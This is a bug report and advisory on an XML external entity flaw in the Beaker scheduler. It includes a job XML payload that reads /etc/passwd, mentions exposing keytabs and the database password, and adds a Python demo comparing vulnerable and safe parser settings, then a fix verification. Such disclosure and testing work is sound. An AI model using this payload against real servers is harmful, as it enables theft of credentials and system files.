Description of problem:
Beaker is vulnerable to "XXE" (XML external entity) attacks. An authenticated user can submit a job XML to the scheduler containing an external entity declaration that references a file on the Beaker server's filesystem; when the entity is expanded, the file's contents are disclosed in the web UI.
For example:
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<job>
<whiteboard>&xxe;</whiteboard>
<recipeSet>
<recipe>
<distroRequires>
<distro_arch op="=" value="x86_64"/>
</distroRequires>
<hostRequires/>
<task name="/distribution/install" role="STANDALONE"/>
</recipe>
</recipeSet>
</job>
This can be exploited to reveal any file on the Beaker server that is readable by the apache user, including Kerberos keytabs and the database password in /etc/beaker/server.cfg.
Note that there are no known ways to exploit this as an anonymous user. It requires malicious action from a user with a valid Beaker account.
Version-Release number of selected component (if applicable):
All Beaker versions are vulnerable.
Steps to Reproduce:
1. Log in to Beaker as any user account
2. Submit a specially crafted job that uses external entity expansion, as in the example above
3. View the job in the web UI
Actual results:
Contents of /etc/passwd are revealed in the job whiteboard.
Expected results:
The job should not be accepted; it should fail to parse with an undefined-entity error.
Additional info:
https://www.owasp.org/index.php/XML_External_Entity_%28XXE%29_Processing
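The disclosure described above and the expected parse failure, shown as an added example (this is not Beaker's own code, and it uses Python's standard-library xml.sax and xml.etree.ElementTree parsers rather than whatever parser Beaker uses). The job XML is the payload from the description with the entity's SYSTEM URL pointed at a temporary file this script creates as a stand-in for /etc/beaker/server.cfg; the file contents are constructed. Parsing with external general entities enabled reproduces the disclosure, parsing with the feature off drops the reference silently, and ElementTree rejects the document with the "undefined entity" error the expected results call for.

```python
import io
import os
import tempfile
import xml.etree.ElementTree as ET
import xml.sax
from pathlib import Path
from xml.sax.handler import ContentHandler, feature_external_ges

# Constructed stand-in for a sensitive file such as /etc/beaker/server.cfg.
SECRET = "db_password=hunter2\n"

# The job XML from the report, with the entity's SYSTEM URL made a template
# so it can point at the temporary file created below instead of /etc/passwd.
JOB_TEMPLATE = """<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "{url}" >]>
<job>
<whiteboard>&xxe;</whiteboard>
<recipeSet>
<recipe>
<distroRequires>
<distro_arch op="=" value="x86_64"/>
</distroRequires>
<hostRequires/>
<task name="/distribution/install" role="STANDALONE"/>
</recipe>
</recipeSet>
</job>
"""


def write_secret_file():
    """Create the file the attacker wants to read; returns its path."""
    fd, path = tempfile.mkstemp(suffix=".cfg")
    with os.fdopen(fd, "w") as f:
        f.write(SECRET)
    return path


def build_job_xml(secret_path):
    """Fill the payload's SYSTEM identifier with a file:// URL for secret_path."""
    return JOB_TEMPLATE.format(url=Path(secret_path).as_uri())


class WhiteboardCollector(ContentHandler):
    """Collects the text inside <whiteboard>, i.e. what the web UI would display."""

    def __init__(self):
        super().__init__()
        self.in_whiteboard = False
        self.parts = []

    def startElement(self, name, attrs):
        if name == "whiteboard":
            self.in_whiteboard = True

    def endElement(self, name):
        if name == "whiteboard":
            self.in_whiteboard = False

    def characters(self, content):
        if self.in_whiteboard:
            self.parts.append(content)


def parse_whiteboard_sax(job_xml, allow_external_entities):
    """Parse with xml.sax. With external general entities enabled, &xxe; is
    replaced by the referenced file's contents (the vulnerable behaviour);
    with the feature off, the parser skips the reference and no text is
    delivered for it."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, allow_external_entities)
    collector = WhiteboardCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(job_xml.encode("utf-8")))
    return "".join(collector.parts)


def parse_whiteboard_etree(job_xml):
    """Parse with ElementTree, which never fetches external entities: the
    document is rejected with an 'undefined entity' ParseError, which is the
    outcome the report's expected results describe.
    Returns (whiteboard_text, error_message)."""
    try:
        root = ET.fromstring(job_xml)
    except ET.ParseError as exc:
        return None, str(exc)
    return root.findtext("whiteboard"), None


if __name__ == "__main__":
    job = build_job_xml(write_secret_file())
    print("external entities on :", repr(parse_whiteboard_sax(job, True)))
    print("external entities off:", repr(parse_whiteboard_sax(job, False)))
    print("ElementTree          :", parse_whiteboard_etree(job))
```

The same payload therefore gives three different outcomes depending only on parser configuration; the check a reviewer wants is that the parser used for untrusted job XML either refuses entity references outright (the ElementTree behaviour) or has external entity loading explicitly disabled.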
Verified this issue.
The result is PASS.
Version: Beaker 20.1.git.5.24dc482
Steps:
1. Log in to Beaker as any user account
2. Submit a specially crafted job using external entity expansion, as per the above example in description
Result: Failed to import job